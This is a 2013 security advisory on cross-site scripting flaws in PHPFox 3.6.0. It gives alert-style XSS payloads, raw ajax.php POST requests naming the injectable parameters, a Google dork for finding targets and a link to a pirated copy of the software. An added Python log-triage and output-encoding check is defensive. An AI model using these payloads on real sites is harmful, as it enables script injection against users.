------------------------------------------------------------
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities
------------------------------------------------------------
Author: #BHG Security Center
Date: Saturday, October 12, 2013
Vendor: http://www.phpfox.com
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.
Tested Version: 3.6.0.Build.6
Vulnerability Type: Cross-Site Scripting
Google Dork: "Powered By PHPFox Version 3.6.0"?
Risk Level: High
Software Price: 299 $
Tested on: Windows, PHP 5.2
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature
-- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com

 
------------------------------------------------------------
== Proof of concept ==
------------------------------------------------------------
 [-] Description :
 [-] PoC 1.1: XSS code injection in the Join field:
 
1) XSS code:  <script>alert(12)</script>
2) Encode to:  &lt;script&gt;alert(12)&lt;/script&gt;
3) Put it in the First name field at Sign Up
4) After logging in, move your mouse over Recent Logins
5) You will see that the XSS code was successful

------------------------------------------------------------
Vulnerable File(s):
                [+] ajax.php
				
Vulnerable Parameter(s):
                [+] sId
                [+] sInput
                [+] title
                [+] type
				
 [-] PoC 2.2:
 ## URL-encoded POST inputs (sId and sInput) were set to <script>alert(0)</script>
 
 ## Request 

POST /upload/static/ajax.php HTTP/1.1

=undefined&core[ajax]=true&core[call]=captcha.reload&core[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]

 [-] PoC 3.3:
 ## URL-encoded POST inputs (title and type) were set to " onmouseover=prompt(951977) bad="
 
  ## Request 
 
POST /upload/static/ajax.php HTTP/1.1

core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74&feed_id=1&height=300&is_feed_view=1&sharemodule=event&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550
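
Added example (not part of the original advisory and not PHPFox code): a Python triage check for logged ajax.php POST bodies that flags the four parameters listed above when they carry markup-breakout characters, together with the output-side encoding that neutralises them. The sample bodies are constructed from the PoC requests above; the function names and the benign sample are assumptions.

```python
import html
from urllib.parse import parse_qsl, urlencode

# Parameters the advisory lists as vulnerable in ajax.php.
WATCHED = {"sId", "sInput", "title", "type"}
# Characters that let a value leave HTML text or a quoted attribute.
BREAKOUT = set("<>\"'`")

def normalise(value, rounds=3):
    """Undo HTML-entity encoding, repeatedly, so &lt;script&gt; (PoC 1.1) is seen as markup."""
    for _ in range(rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(body):
    """Map each watched parameter that carries breakout characters to its decoded value."""
    hits = {}
    # parse_qsl performs the URL decoding of the form body.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = normalise(raw)
        if name in WATCHED and BREAKOUT & set(value):
            hits[name] = value
    return hits

def encode_for_output(value):
    """Server-side fix: entity-encode once at output time, quotes included."""
    return html.escape(value, quote=True)

# Constructed sample bodies, modelled on the PoC requests (tokens omitted).
SAMPLES = {
    "poc_2_2": urlencode({"core[call]": "captcha.reload",
                          "sId": "<script>alert(0)</script>",
                          "sInput": "<script>alert(0)</script>"}),
    "poc_3_3": urlencode({"core[call]": "share.popup",
                          "title": '" onmouseover=prompt(951977) bad="',
                          "type": '" onmouseover=prompt(951977) bad="'}),
    "benign": urlencode({"core[call]": "share.popup",
                         "title": "Summer meetup", "type": "event"}),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, suspicious_params(body))
    print(encode_for_output('" onmouseover=prompt(951977) bad="'))
```

The character check also fires on legitimate values containing quotes or apostrophes, so hits are leads for log review rather than a blocking rule; encoding at output is the actual fix.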

------------------------------------------------------------
Timeline:
------------------------------------------------------------
Advisory Publication:  September 18, 2013  [without technical details]
Vendor Notification: September 18, 2013
Public Disclosure: October 12, 2013

#BHG Security Center
# Gr33tz:
# Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d
# HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini